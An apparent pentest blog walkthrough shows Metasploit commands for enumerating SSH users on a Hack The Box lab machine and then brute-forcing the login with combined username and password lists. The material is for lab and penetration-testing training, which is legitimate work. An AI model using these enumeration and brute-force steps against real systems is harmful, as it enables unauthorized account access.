In this blog post, I will show you how to automate a brute force attack on SSH with the help of Metasploit. The methodology that I present here can be used in a penetration test to check if the credentials of any SSH login are strong enough and, perhaps more importantly, to understand whether the blue team detects our brute force attacks.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Nibbles’s IPv4 address. Here we can also see that this is a Linux machine.
We first scan the target machine in order to identify open ports and services running behind those ports.
Ports 22 (SSH) and 80 (HTTP) are open. In this post I will focus on SSH, even if HTTP is the way in for this machine1.
Brute force SSH attack
We Google search “openssh 7.2p2 exploit”. From the results, we learn that we can enumerate users on an OpenSSH server using a malformed packet or timing attack. The idea here is to enumerate the users on this SSH server and then combine this list with common SSH passwords in order to run an automated brute force SSH attack.
To enumerate the users we will use the auxiliary/scanner/ssh/ssh_enumusers module on Metasploit with unix-users.txt as user list. Moreover, we will log the output of this module for later processing.
msfconsole
use auxiliary/scanner/ssh/ssh_enumusers
set rhosts 10.10.10.75
set user_file /usr/share/wordlists/metasploit/unix_users.txt
spool /root/Documents/nibbles/ssh_enumusers.log
run
We now extract the usernames from the log file with grep and save the output in ssh-users.txt
grep -v "not" ssh_enumusers.log | awk '{ if ($6 == "User") { print substr($7,2,length($7)-2) } }' > ssh-users.txt
The next step is to download a list of common SSH passwords and combine it with the username list that we already have. We first download this list which contains 21 passwords (even if the file name says 20). Then we run my shell script (s. screenshot below) to combine each username with each password. Each entry will be on its own line, and each username and password pair will be separated by a space.
We then make this script executable with chmod 744 combi-usernames-passwords.sh and run it. The new list, which is saved in users-passwords-ssh.txt, contains 630 credential pairs. Now we will use this list to run the Metasploit’s module auxiliary/scanner/ssh/ssh_login which will brute force the SSH login.
msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 10.10.10.75
set stop_on_success true
set verbose true
set userpass_file /root/Documents/nibbles/users-passwords-ssh.txt
run
After some minutes, this module will terminate without having found a valid combination. This is fine as we only used 21 SSH passwords. If this were a pentest, we would expect the blue team to detect our attack as we made a lot of noise banging on their doors.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!
- If you are stuck, have a look at Heath Adams’s solution here: Pentesting for n00bs: Episode 6 – Nibbles